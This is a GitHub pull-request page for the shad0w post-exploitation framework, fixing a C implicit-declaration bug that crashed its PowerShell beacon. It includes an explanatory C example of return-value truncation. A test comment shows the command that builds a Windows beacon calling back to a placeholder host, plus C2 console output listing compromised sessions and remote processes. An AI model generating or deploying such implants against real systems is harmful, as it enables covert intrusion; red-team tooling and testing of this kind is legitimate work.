bats3c / shad0w

A post exploitation framework designed to operate covertly on heavily monitored environments
https://blog.dylan.codes/shad0w/
MIT License

Issue 35 ps crashes powershell beacon #36

Closed bblenard closed 4 years ago

bblenard commented 4 years ago

Add stdlib header with function prototypes

The PS command was crashing beacons because of data truncation as a result of an implicit function declaration bug. This change adds a stdlib header that defines all stdlib functions. This file can be included by the beacons to avoid implicit function declarations.

Closes #35
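The failure mode described above is worth seeing in isolation. The following is an added C example, not code from the shad0w repository: it models what the caller observes when a function that really returns a 64-bit value (a pointer, for instance) is called without a prototype. Under the old C implicit-declaration rule the compiler assumes the callee returns `int`, so only the low 32 bits of the return register are kept and then sign-extended back to 64 bits. The function names are hypothetical; the sample values are constructed to look like x64 user-mode addresses.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-in for a correctly prototyped runtime routine that
   returns a 64-bit value (e.g. a pointer-sized handle or buffer address). */
static uint64_t correct_call(uint64_t real_value)
{
    return real_value;
}

/* The value the caller ends up with when the same routine was never
   declared: the return is read as a 32-bit int (low half of the return
   register) and sign-extended when converted back to a 64-bit type. */
static uint64_t implicit_int_view(uint64_t real_value)
{
    int as_int = (int)(uint32_t)real_value;   /* keep low 32 bits only */
    return (uint64_t)(int64_t)as_int;         /* sign-extend back up   */
}

/* Returns 1 when an implicitly declared call would corrupt this value,
   i.e. when the value does not survive the int round trip unchanged. */
static int would_truncate(uint64_t real_value)
{
    return implicit_int_view(real_value) != correct_call(real_value);
}

int main(void)
{
    /* Constructed sample values: one below 4 GiB, two typical x64
       user-mode addresses, one with bit 31 set (sign-extension case). */
    const uint64_t samples[] = {
        0x0000000012345678ULL,
        0x00007FFE12345678ULL,
        0x00007FFF80000000ULL,
        0x0000000080000000ULL,
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("real=0x%016llx  seen=0x%016llx  corrupted=%s\n",
               (unsigned long long)samples[i],
               (unsigned long long)implicit_int_view(samples[i]),
               would_truncate(samples[i]) ? "yes" : "no");
    }
    return 0;
}
```

The practical check is to make the compiler refuse the pattern outright: GCC and Clang accept `-Werror=implicit-function-declaration`, which turns every call to an undeclared function into a build error, so a missing header surfaces at compile time rather than as a crash in a running beacon.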

bblenard commented 4 years ago

Tested powershell x64 static payload ps command. The payload was generated via the following command: ./shad0w.py beacon -p x64/windows/static -H TESTIP -f psh -o ~/shad0w/.bridge/www/beacon.ps1 -d

[DEBUG] HTTP - '/register' was hit, attempting to register
[i] Beacon: rto@RTO-WIN10 (ARCH: x64, OS: Windows 10, Type: INSECURE)
shad0w(rto@RTO-WIN10) ≫ beacons
[i] 8 active beacons

+--------+---------------+----------------------------+
| Number |    Session    |        Last Checkin        |
+--------+---------------+----------------------------+
|   1    | rto@RTO-WIN10 | 2020-09-14 22:29:48.260678 |
|   2    | rto@RTO-WIN10 | 2020-09-14 22:39:14.543030 |
|   3    | rto@RTO-WIN10 | 2020-09-14 22:44:10.844078 |
|   4    | rto@RTO-WIN10 | 2020-09-14 22:44:11.662407 |
|   5    | rto@RTO-WIN10 | 2020-09-14 22:46:45.526524 |
|   6    | rto@RTO-WIN10 | 2020-09-14 22:50:37.752870 |
|   7    | rto@RTO-WIN10 | 2020-09-14 22:51:56.216035 |
|   8    | rto@RTO-WIN10 | 2020-09-14 23:11:02.245420 |
+--------+---------------+----------------------------+
shad0w(rto@RTO-WIN10) ≫ beacons -i 8
shad0w(rto@RTO-WIN10) ≫ ps
[i] Beacon (8be9e8b21815b9ddff533299043d2544) received task
PID     PPID    Arch    User                                    Name
===     ====    ====    ====                                    ====

0       0                                                       [System Process]
4       0                                                       System
368     4                                                       smss.exe
452     440                                                     csrss.exe
540     440                                                     wininit.exe